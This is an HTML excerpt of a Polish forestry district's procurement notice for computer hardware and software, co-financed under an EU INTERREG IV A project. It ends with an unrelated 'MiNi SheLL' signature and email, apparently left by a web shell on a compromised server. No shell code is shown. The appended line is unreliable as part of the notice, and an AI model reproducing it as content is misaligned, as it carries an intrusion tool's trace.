<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2013 godzina 10:30, miejsce: Nadleśnictwo Drawno
ul. Kaliska 5
73-220 Drawno
pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa sprzętu komputerowego i oprogramowania do Nadleśnictwa DRAWNO jest realizowana w ramach projektu pt.: Opracowanie transgranicznego systemu wspomagania procesów decyzyjnych dla zdalnej i modelowej oceny biomasy drzewnej w lasach obszaru wsparcia POMERANIA (ForseenPOMERANIA) współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Celu 3 Europejska Współpraca Terytorialna - Współpraca Transgraniczna krajów Meklemburgia - Pomorze Przednie Brandenburgia i Rzeczypospolitej Polskiej (Województwo Zachodniopomorskie) 2007 - 2013 INTERREG IV A.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com